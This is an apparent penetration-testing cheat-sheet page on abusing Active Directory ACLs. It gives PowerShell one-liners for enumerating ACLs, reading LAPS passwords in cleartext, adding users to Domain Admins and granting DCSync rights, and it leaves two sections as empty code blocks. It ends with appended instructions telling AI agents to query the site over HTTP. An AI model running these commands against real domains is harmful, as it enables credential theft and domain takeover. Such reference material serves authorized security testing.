# ACL Abuse

## Enumeration

{% tabs %}
{% tab title="ADModule" %}

```
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1

# Get DistinguishedName
Get-ADUser -Identity USER

# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access
```

{% endtab %}

{% tab title="PowerView\_Dev" %}

```
Find-InterestingDomainACL -ResolveGUIDs
```

{% endtab %}

{% tab title="PowerView" %}

```
Invoke-ACLScanner -ResolveGUIDs
```

{% endtab %}
{% endtabs %}

## ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. The IdentityReferenceName can read the LAPS password in cleartext for the OU.

{% tabs %}
{% tab title="LAPS Module" %}

```
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1 

# Find the OUs that can read LAPS passwords
Find-AdmPwdExtendedRights -Identity <OU>

# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>
```

{% endtab %}
{% endtabs %}

## WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group&#x20;

{% tabs %}
{% tab title="ADModule" %}

```
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS

# Check
Get-ADGroupMember -Identity "LocalAdmins"
```

{% endtab %}

{% tab title="PowerView\_dev" %}

```
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'
```

{% endtab %}
{% endtabs %}

## GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform Resource Based Constrained Delegation Attack

```
```

## GenericAll over User Object

Can reset their password without knowing the old one&#x20;

```
```

## WriteDACL over DC

Can give DCSync privs to user

{% tabs %}
{% tab title="RACE" %}

```
Set-ADACL -SamAccountName USER\DOMAIN DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
```

{% endtab %}

{% tab title="PowerView3" %}

```
Add-DomainObjectAcl -PrincipalIdentity USER -Rights DCSync
```

{% endtab %}
{% endtabs %}

## Resources

{% embed url="<https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cheats.philkeeble.com/active-directory/ad-privilege-escalation/acl-abuse.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.